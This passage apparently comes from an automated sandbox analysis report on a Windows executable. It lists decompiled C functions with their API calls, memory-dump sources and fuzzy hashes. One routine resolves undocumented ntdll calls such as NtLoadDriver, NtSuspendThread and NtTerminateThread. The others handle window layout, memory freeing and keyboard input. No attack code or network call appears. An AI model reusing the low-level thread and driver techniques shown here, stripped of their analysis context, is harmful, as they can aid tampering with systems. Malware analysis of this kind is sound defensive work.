                                                                                                                				_t139 = _t87;
                                                                                                                				if(_t87 == 0) {
                                                                                                                					_t88 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                				} else {
                                                                                                                					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x50)) = 0;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
                                                                                                                				return E0040686C(_t131);
                                                                                                                			}

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                                • memcpy.MSVCRT ref: 0040696D
                                                                                                                • memcpy.MSVCRT ref: 0040697E
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 975042529-0
                                                                                                                • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                                • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                				int _v8;
                                                                                                                				int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				void* _v20;
                                                                                                                				int _v24;
                                                                                                                				void _v56;
                                                                                                                				char _v584;
                                                                                                                				char _v588;
                                                                                                                				char _v41548;
                                                                                                                				void* __edi;
                                                                                                                				void* _t40;
                                                                                                                				void _t46;
                                                                                                                				intOrPtr _t47;
                                                                                                                				intOrPtr* _t64;
                                                                                                                				intOrPtr* _t66;
                                                                                                                				intOrPtr _t67;
                                                                                                                				intOrPtr _t71;
                                                                                                                				int _t77;
                                                                                                                				void* _t80;
                                                                                                                				void* _t81;
                                                                                                                				void* _t82;
                                                                                                                				void* _t83;
                                                                                                                
                                                                                                                				E0040B550(0xa248, __ecx);
                                                                                                                				_t77 = 0;
                                                                                                                				_v8 = 0;
                                                                                                                				E00408E31();
                                                                                                                				_t40 =  *0x41c47c;
                                                                                                                				if(_t40 != 0) {
                                                                                                                					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
                                                                                                                				}
                                                                                                                				if(_v8 == _t77) {
                                                                                                                					_v8 = 0x186a0;
                                                                                                                				}
                                                                                                                				_v8 = _v8 + 0x3e80;
                                                                                                                				_push(_v8);
                                                                                                                				L0040B26C();
                                                                                                                				_t81 = _t40;
                                                                                                                				_v20 = _t81;
                                                                                                                				memset(_t81, _t77, _v8);
                                                                                                                				_t83 = _t82 + 0x10;
                                                                                                                				_v24 = _t77;
                                                                                                                				E00408E31();
                                                                                                                				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
                                                                                                                				L5:
                                                                                                                				while(1) {
                                                                                                                					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
                                                                                                                						L16:
                                                                                                                						_t46 =  *_t81;
                                                                                                                						_t77 = 0;
                                                                                                                						if(_t46 == 0) {
                                                                                                                							_push(_v20);
                                                                                                                							L0040B272();
                                                                                                                							return _t46;
                                                                                                                						}
                                                                                                                						_t81 = _t81 + _t46;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					_t47 = _a4;
                                                                                                                					_t71 =  *((intOrPtr*)(_t47 + 0x34));
                                                                                                                					_v12 = _t77;
                                                                                                                					_v16 = _t71;
                                                                                                                					if(_t71 <= _t77) {
                                                                                                                						L10:
                                                                                                                						_t66 = 0;
                                                                                                                						L11:
                                                                                                                						if(_t66 == 0) {
                                                                                                                							E004090AF( &_v588);
                                                                                                                							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                                                							_t32 = _t81 + 0x20; // 0x20
                                                                                                                							memcpy( &_v56, _t32, 8);
                                                                                                                							_t83 = _t83 + 0x10;
                                                                                                                							E004099ED(_a4 + 0x28,  &_v588);
                                                                                                                						} else {
                                                                                                                							_t26 = _t66 + 4; // 0x4
                                                                                                                							_t72 = _t26;
                                                                                                                							if( *_t26 == 0) {
                                                                                                                								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                                                								_t28 = _t81 + 0x20; // 0x20
                                                                                                                								memcpy(_t66 + 0x214, _t28, 8);
                                                                                                                								_t83 = _t83 + 0x10;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L16;
                                                                                                                					}
                                                                                                                					_t67 =  *((intOrPtr*)(_t81 + 0x44));
                                                                                                                					_t80 = _t47 + 0x28;
                                                                                                                					while(1) {
                                                                                                                						_t64 = E00405A92(_v12, _t80);
                                                                                                                						if( *_t64 == _t67) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_v12 = _v12 + 1;
                                                                                                                						if(_v12 < _v16) {
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					_t66 = _t64;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                			}


























                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                                • memset.MSVCRT ref: 00409805
                                                                                                                • memcpy.MSVCRT ref: 0040988A
                                                                                                                • memcpy.MSVCRT ref: 004098C0
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3641025914-0
                                                                                                                • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                                • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E004067AC(char** __edi) {
                                                                                                                				void* __esi;
                                                                                                                				void* _t9;
                                                                                                                				void** _t11;
                                                                                                                				char** _t15;
                                                                                                                				char** _t24;
                                                                                                                				void* _t25;
                                                                                                                				char* _t28;
                                                                                                                				char* _t29;
                                                                                                                				char* _t30;
                                                                                                                				char* _t31;
                                                                                                                				char** _t33;
                                                                                                                
                                                                                                                				_t24 = __edi;
                                                                                                                				 *__edi = "cf@";
                                                                                                                				_t9 = E00406746(__edi);
                                                                                                                				_t28 = __edi[5];
                                                                                                                				if(_t28 != 0) {
                                                                                                                					_t9 = E004055D1(_t9, _t28);
                                                                                                                					_push(_t28);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t29 = _t24[4];
                                                                                                                				if(_t29 != 0) {
                                                                                                                					_t9 = E004055D1(_t9, _t29);
                                                                                                                					_push(_t29);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t30 = _t24[3];
                                                                                                                				if(_t30 != 0) {
                                                                                                                					_t9 = E004055D1(_t9, _t30);
                                                                                                                					_push(_t30);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t31 = _t24[2];
                                                                                                                				if(_t31 != 0) {
                                                                                                                					E004055D1(_t9, _t31);
                                                                                                                					_push(_t31);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t15 = _t24;
                                                                                                                				_pop(_t32);
                                                                                                                				_push(_t24);
                                                                                                                				_t33 = _t15;
                                                                                                                				_t25 = 0;
                                                                                                                				if(_t33[1] > 0 && _t33[0xd] > 0) {
                                                                                                                					do {
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
                                                                                                                						_t25 = _t25 + 1;
                                                                                                                					} while (_t25 < _t33[0xd]);
                                                                                                                				}
                                                                                                                				_t11 =  *( *_t33)();
                                                                                                                				free( *_t11);
                                                                                                                				return _t11;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                                • free.MSVCRT(00000000), ref: 00406839
                                                                                                                  • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2241099983-0
                                                                                                                • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                                • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                                                				intOrPtr _v12;
                                                                                                                				struct tagPOINT _v20;
                                                                                                                				struct tagRECT _v36;
                                                                                                                				int _t27;
                                                                                                                				struct HWND__* _t30;
                                                                                                                				struct HWND__* _t32;
                                                                                                                
                                                                                                                				_t30 = _a4;
                                                                                                                				if((_a8 & 0x00000001) != 0) {
                                                                                                                					_t32 = GetParent(_t30);
                                                                                                                					GetWindowRect(_t30,  &_v20);
                                                                                                                					GetClientRect(_t32,  &_v36);
                                                                                                                					MapWindowPoints(0, _t32,  &_v20, 2);
                                                                                                                					_t27 = _v36.right - _v12 - _v36.left;
                                                                                                                					_v20.x = _t27;
                                                                                                                					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                                                                                				}
                                                                                                                				if((_a8 & 0x00000002) != 0) {
                                                                                                                					E00404FBB(_t30);
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 00405D0A
                                                                                                                • GetWindowRect.USER32 ref: 00405D17
                                                                                                                • GetClientRect.USER32 ref: 00405D22
                                                                                                                • MapWindowPoints.USER32 ref: 00405D32
                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4247780290-0
                                                                                                                • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                                • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E004083DC(void* __eax, int __ebx, void* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* _v16;
                                                                                                                				void* _t20;
                                                                                                                				void* _t21;
                                                                                                                				signed int _t28;
                                                                                                                				void* _t32;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				_t20 = __eax;
                                                                                                                				_v12 = _v12 & 0x00000000;
                                                                                                                				_push(__ebx);
                                                                                                                				_t28 = __eax - 1;
                                                                                                                				L0040B26C();
                                                                                                                				_v16 = __eax;
                                                                                                                				if(_t28 > 0) {
                                                                                                                					_t21 = _a4;
                                                                                                                					_v8 = __ebx;
                                                                                                                					_v8 =  ~_v8;
                                                                                                                					_t32 = _t28 * __ebx + _t21;
                                                                                                                					_a4 = _t21;
                                                                                                                					do {
                                                                                                                						memcpy(_v16, _a4, __ebx);
                                                                                                                						memcpy(_a4, _t32, __ebx);
                                                                                                                						_t20 = memcpy(_t32, _v16, __ebx);
                                                                                                                						_a4 = _a4 + __ebx;
                                                                                                                						_t32 = _t32 + _v8;
                                                                                                                						_t34 = _t34 + 0x24;
                                                                                                                						_v12 = _v12 + 1;
                                                                                                                						_t28 = _t28 - 1;
                                                                                                                					} while (_t28 > _v12);
                                                                                                                				}
                                                                                                                				_push(_v16);
                                                                                                                				L0040B272();
                                                                                                                				return _t20;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$??2@??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252195045-0
                                                                                                                • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                                • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E00406746(void* __esi) {
                                                                                                                				intOrPtr _t9;
                                                                                                                				intOrPtr _t10;
                                                                                                                				intOrPtr _t11;
                                                                                                                				intOrPtr* _t18;
                                                                                                                				void* _t19;
                                                                                                                
                                                                                                                				_t19 = __esi;
                                                                                                                				_t9 =  *((intOrPtr*)(__esi + 0x30));
                                                                                                                				if(_t9 != 0) {
                                                                                                                					_push(_t9);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t10 =  *((intOrPtr*)(_t19 + 0x40));
                                                                                                                				if(_t10 != 0) {
                                                                                                                					_push(_t10);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
                                                                                                                				if(_t11 != 0) {
                                                                                                                					_push(_t11);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
                                                                                                                				if(_t18 != 0) {
                                                                                                                					_t11 =  *_t18;
                                                                                                                					if(_t11 != 0) {
                                                                                                                						_push(_t11);
                                                                                                                						L0040B272();
                                                                                                                						 *_t18 = 0;
                                                                                                                					}
                                                                                                                					_push(_t18);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
                                                                                                                				 *((intOrPtr*)(_t19 + 0x30)) = 0;
                                                                                                                				 *((intOrPtr*)(_t19 + 0x40)) = 0;
                                                                                                                				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
                                                                                                                				return _t11;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                                • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				struct HDWP__* _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				void* __ebx;
                                                                                                                				intOrPtr _t37;
                                                                                                                				intOrPtr _t42;
                                                                                                                				RECT* _t44;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t42 = __ecx;
                                                                                                                				_v12 = __ecx;
                                                                                                                				if(_a4 != 5) {
                                                                                                                					if(_a4 != 0xf) {
                                                                                                                						if(_a4 == 0x24) {
                                                                                                                							_t37 = _a12;
                                                                                                                							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
                                                                                                                							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						E00402EC8(__ecx + 0x378);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_v8 = BeginDeferWindowPos(3);
                                                                                                                					_t44 = _t42 + 0x378;
                                                                                                                					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
                                                                                                                					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
                                                                                                                					EndDeferWindowPos(_v8);
                                                                                                                					InvalidateRect( *(_t44 + 0x10), _t44, 1);
                                                                                                                					_t42 = _v12;
                                                                                                                				}
                                                                                                                				return E00402CED(_t42, _a4, _a8, _a12);
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                                  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                  • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                • String ID: $
                                                                                                                • API String ID: 2498372239-3993045852
                                                                                                                • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                                • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                				int _t14;
                                                                                                                
                                                                                                                				if(_a8 == 0x100 && _a12 == 0x41) {
                                                                                                                					GetKeyState(0xa2);
                                                                                                                					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
                                                                                                                						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
                                                                                                                							_t14 = E00403A60(0xa5);
                                                                                                                							if(_t14 == 0) {
                                                                                                                								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
                                                                                                                			}





                                                                                                                APIs
                                                                                                                • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                                  • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: State$CallMessageProcSendWindow
                                                                                                                • String ID: A
                                                                                                                • API String ID: 3924021322-3554254475
                                                                                                                • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                                • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
                                                                                                                				intOrPtr _v20;
                                                                                                                				char _v1072;
                                                                                                                				void _v3672;
                                                                                                                				char _v4496;
                                                                                                                				intOrPtr _v4556;
                                                                                                                				char _v4560;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr* _t41;
                                                                                                                				void* _t45;
                                                                                                                
                                                                                                                				_t45 = __eflags;
                                                                                                                				E0040B550(0x11cc, __ecx);
                                                                                                                				E00402923( &_v4560);
                                                                                                                				_v4560 = 0x40db44;
